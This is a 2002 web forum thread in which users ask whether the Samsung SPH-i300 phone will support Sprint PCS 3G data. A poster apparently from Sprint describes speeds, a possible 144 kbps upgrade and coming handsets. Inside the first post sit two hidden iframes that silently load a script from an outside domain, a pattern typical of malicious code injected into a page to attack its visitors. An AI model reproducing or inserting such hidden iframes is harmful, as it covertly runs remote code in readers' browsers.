+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

3g?

when is it expected to be available? and will the i300 be compatible when it DOES come out? or would we all have to buy new phones again? if thats the case, i can wait a month or two for a new phone....

i hope....cuz im reaaalllyyyyy wantingthe i300 right aobut now...but with 3g on the way....

what exactly are the benefits of 3g besieds an always on type datat connection "surf while talking" and 144kbps conn. ?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

would it be worth it to wait for 3g if all im really going to use the phone for is quick news updates, occasinal browsing, and Instant Messaging?

and is there any new color palm-phones on the horizon that WILL be 3G ready?

The question of i300 3G capabilities has been discussed before. It is NOT 3G capable. As far as when Sprint PCS will have 3G up and running, my guess is maybe in selected markets by the end of the year. If it were close, Sprint would be hyping it like crazy. There have also been other threads about 3G, you you may wish to do a search. Basically, if you need a PDA/Phone get the i300 or Kyo 6035 now. By the time 3G is common, I suspect you will be ready for a new phone. The shelf life of technology is very short.
    Carl

(Click a sponser today!)

Cool What's coming for 3G.

Hey, check out this site for what's coming down the line for 3G devices.

http://www.3g-generation.com/all.htm

Go to the individual manufacturer's at the top for a little more info. Samsung shows a i260 concept Smart Phone that i'm guessing was an early prototype for the i300.

Interesting and exciting!
    Gary

Talking Article on 3G..with i300 on Cover

The current (April 2002) issue of cumpter user mag (actually a small newspaper type deal) had a full page picture of the i300 under with a corresponding story on 3G.

Here is the link

Sprint PCS 3G Nationwide Launch

About your question of when it will be launch the 3G Services, let me tell you that Sprint PCS will launch the 3G Services Nationwide on this Summer. Now the SPH-I300 will be running a partial 3G services, like the others handsets we have now. In others words, You can still using your phone, but it will be limited for 144 kbps data. Probably sounds confusing, but the reality is the 3G services is to run 2.5 mbps to 5 mbps, so you can enjoy features like video streaming, music downloading, video conference, web browsing,etc. We will be releasing 13 new 3G handsets for this summer and so forth, so you will have a good selection for your needs and expectations.

This is one of them... Enjoy:
    Attached Thumbnails Attached Thumbnails Third Generation (3G)-sph-i3303.jpg  
    ptorres

So Percy, just to clarify: The I300 DOES have partial 3G support (144kbps). This is contrary to what we heard in the past. And if the I300 is partial, then the I330 is full 3G (up to 5 mbps)?

Steve

Let me explain you how this works ok?

The true Speed of 3G is 2.5 to 5 Mbps. Now when we launching the 3G Services it will only tenfold the current speed (wich is 14.4 Kbps) so it will be 144Kbps for this year. Next Year will be from 365 Kbps to 2.5 Mbps, and on 2004 it will be 5 Mbps. Now Any handset that we have on the market right now that do not show on the back this: "3G CDMA Qualcomm" will not work on the 3G service, but because our network will be bacwards compatible, you can still use it. With the exception of the SPH-I300, because you can change the speed up to 144 Kbps data only. Now don't be fool to think that SPH-I300 is a 3G Handset, just because it has the capability to switch up to 144 Kbps. Because the 3G services will require more advance features, so you can enjoy a true 3G service.
    Last edited by ptorres; 04-14-2002 at 01:50 PM.
    ptorres

Percy,

Thanks for the clarification, I am looking forward to the software upgrade to get at least 144 kbps (but I will probably upgrade to the I330 when it comes out anyway). I always thought of 3G as just a speed increase, what features and services will be availble to 3G phones from Sprint this year and the coming years?

Steve

Administrator
    Originally posted by Vasqus
    Percy,

Thanks for the clarification, I am looking forward to the software upgrade to get at least 144 kbps (but I will probably upgrade to the I330 when it comes out anyway). I always thought of 3G as just a speed increase, what features and services will be availble to 3G phones from Sprint this year and the coming years?

Steve
    read thru this thread for links to 3g discussion sites. for 2.5g'ers, we can bascially expect longer battery usage and reduced dropped calls. 3g will allow more phones on the same tower than now (increased channel bandwidth), also as ptorres discussed, streaming audio/video, faster data rates, always on capability. 3g loooks and sounds great, doesnt it?

3G will provide a faster and easier way for consumers and business customers to access the information and applications they use today, allowing them to tailor services to their individual needs. 3G creates the opportunity for new and more robust applications as data speeds increase, including video and audio streaming, high-speed Internet browsing, e-mail with attachments, digital imaging, rich messaging, on-demand conferencing, voice-to-text applications and more on a variety of wireless devices.

Clearly, 3G will be essential to the lives of Sprint PCS customers, providing data-ready products and services that are always with them, enhancing the way they work, learn, play and more importantly, communicate.
    Attached Thumbnails Attached Thumbnails Third Generation (3G)-sanyo-3g-4.jpg  
    ptorres

Originally posted by ptorres
    Let me explain you how this works ok?

The true Speed of 3G is 2.5 to 5 Mbps. Now when we launching the 3G Services it will only tenfold the current speed (wich is 14.4 Kbps) so it will be 144Kbps for this year. Next Year will be from 365 Kbps to 2.5 Mbps, and on 2004 it will be 5 Mbps. Now Any handset that we have on the market right now that do not show on the back this: "3G CDMA Qualcomm" will not work on the 3G service, but because our network will be bacwards compatible, you can still use it. With the exception of the SPH-I300, because you can change the speed up to 144 Kbps data only. Now don't be fool to think that SPH-I300 is a 3G Handset, just because it has the capability to switch up to 144 Kbps. Because the 3G services will require more advance features, so you can enjoy a true 3G service.
    Percy,
    Come on! Are we really going to see 144k? Don't get me wrong, I am a big, BIG Sprint PCS pro-ponent, but I can not believe that we are really going to get 144.
    What does Sprint PCS corporate say about data speeds?

homer

Originally posted by ptorres
    With the exception of the SPH-I300, because you can change the speed up to 144 Kbps data only. Now don't be fool to think that SPH-I300 is a 3G Handset, just because it has the capability to switch up to 144 Kbps. Because the 3G services will require more advance features, so you can enjoy a true 3G service.
    So how will the I300 be upgraded to support 144kbps data? I was under the impression that we were stuck with 14.4 on the I300.

I to believed we would not see speeds faster than 14.4kbps.

Is this true?

Will I be able to reach speeds up to 144kbps on the I300 currently in my pocket?

Anyone know if the 6035 (Kyo) will be able to take advantage of the 144K as reported here that the i300 will be able to do. If that is the case, I will definitely be sitting on the sidelines when it comes to buying a new phone. I can see me and the i300 happily together for another 2 years or so.
    Carl

As Percy of Sprint already said in his message, the I300 will go as high as 144 kbps with a Phone software upgrade. But the I300 is not 3G so it will not go any higher. He says to expect it by summer from Sprint.

i300 knucklehead
    Originally posted by Vasqus
    As Percy of Sprint already said in his message, the I300 will go as high as 144 kbps with a Phone software upgrade. But the I300 is not 3G so it will not go any higher. He says to expect it by summer from Sprint.
    That would be cool enough for me for now. 144kbps is pretty nice. Hell, I'd be happy for 56K even right now. That will comfort me until the 3G urge gets too strong and I *have* to upgrade. Not that I don't trust Percy, but he seems to do a lot of cut-and-paste of company literature into his emails, and sometimes people like that get the facts a little skewed. He however sounds like a good salesman...

If a 144kbps free upgrade is indeed do-able for this phone I will be a happy camper. But I am not getting too psyched yet. I would imagine this will be a bring-in-store type of upgrade though, right?

I have one question, when 3G for the I300, or 2.5. 1/2 G or whatever hits the market, are they going to bill like the wireless web ($5/unlimited) or are they going to get like Verizon, charging customer by the byte/hour?
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Well since the I300 doesn't have 3G and its always on capabilities, it seems like they will still bill for minutes. Hopefully they will not increase the rate.

Their argument will be, well, now you can download 10 times faster, so we can charge you ten times the price and it should all work out the same. I SURE hope that is not the case.
    Carl